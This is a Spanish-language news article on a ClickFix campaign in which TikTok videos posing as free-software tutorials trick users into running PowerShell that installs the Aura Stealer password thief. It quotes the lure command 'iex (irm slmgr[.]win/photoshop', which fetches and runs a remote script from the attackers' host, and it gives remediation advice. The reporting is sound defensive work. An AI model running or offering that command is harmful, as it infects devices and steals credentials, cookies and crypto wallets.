Ciberdelincuentes utilizan videos de TikTok para difundir virus que roban contraseñas

El uso de videos en TikTok como herramienta para la propagación de virus informáticos capaces de robar contraseñas ha encendido las alarmas en la comunidad de ciberseguridad.

Una reciente campaña identificada en la plataforma de videos cortos de ByteDance explota la popularidad de guías que prometen acceso gratuito a programas y servicios de pago, como Windows, Netflix o Photoshop, para engañar a los usuarios y comprometer la seguridad de sus dispositivos.

El responsable del SANS Internet Storm Center (ISC), Xavier Mertens, ha advertido sobre la sofisticación de estos ataques, conocidos como ClickFix, que se presentan como soluciones a supuestos problemas técnicos.

Según explicó Mertens en un comunicado publicado en la web de ISC y verificado por Bleeping Computer, los ciberdelincuentes emplean videos que simulan ser tutoriales para desbloquear funciones premium o activar software sin coste.

En realidad, estos contenidos inducen a los usuarios a ejecutar comandos maliciosos en PowerShell, bajo la falsa promesa de obtener acceso gratuito a servicios como Microsoft 365, Adobe Photoshop, Netflix o Spotify.

La técnica de ClickFix se basa en la manipulación mediante ingeniería social. Los videos instruyen a los espectadores para que sigan una serie de pasos, entre los que se incluye la ejecución de un comando corto, como ‘iex (irm slmgr[.]win/photoshop’, presentado como necesario para lograr el objetivo del tutorial.

La campaña aprovecha la confianza que los usuarios depositan en los tutoriales de TikTok, una plataforma frecuentada por personas de todas las edades en busca de entretenimiento o información.

Al seguir las instrucciones de estos videos, los usuarios no solo exponen sus dispositivos a infecciones, ponen en riesgo la integridad de todas sus cuentas online.

La ejecución del comando es en realidad un fragmento de código malicioso que, al ejecutarse como administrador, conecta el dispositivo con el sitio remoto ‘slmgr[.]win’. Desde allí, se descarga y ejecuta un nuevo script de PowerShell que, a su vez, instala dos archivos ejecutables en el sistema.

Uno de estos ejecutables corresponde a una variante del malware de robo de información conocido como Aura Stealer. Este programa malicioso se especializa en recopilar datos sensibles, como credenciales de acceso almacenadas en navegadores, cookies de autenticación y billeteras de criptomonedas.

El segundo ejecutable, según detalló el experto en ciberseguridad del ISE, se encarga de compilar código bajo demanda, aunque su función final aún no ha sido determinada.

Los expertos en ciberseguridad han subrayado que quienes hayan ejecutado los pasos sugeridos en estos videos deben restablecer las contraseñas de todos los sitios web que utilicen, porque sus credenciales pueden haber quedado comprometidas.

Si un usuario ejecutó comandos sugeridos en videos de TikTok y sospecha que su dispositivo está comprometido, debe actuar de inmediato. El principal consejo es cambiar todas las contraseñas de servicios utilizados, porque las credenciales pueden haber sido robadas por malware como Aura Stealer.

Asimismo, se debe realizar un análisis completo con software de seguridad actualizado para detectar y eliminar cualquier archivo sospechoso instalado como parte del ataque. Limpiar el sistema y actualizar los métodos de autenticación refuerza la protección tras un incidente de esta característica.

En adelante, para evitar nuevos riesgos, es fundamental desactivar privilegios de administrador al realizar acciones cotidianas y activar la verificación en dos pasos en las cuentas más importantes.

Filtrar la información consultada, limitar la ejecución de comandos provenientes de tutoriales no oficiales y consultar siempre fuentes de confianza reduce la exposición ante futuras campañas de ingeniería social.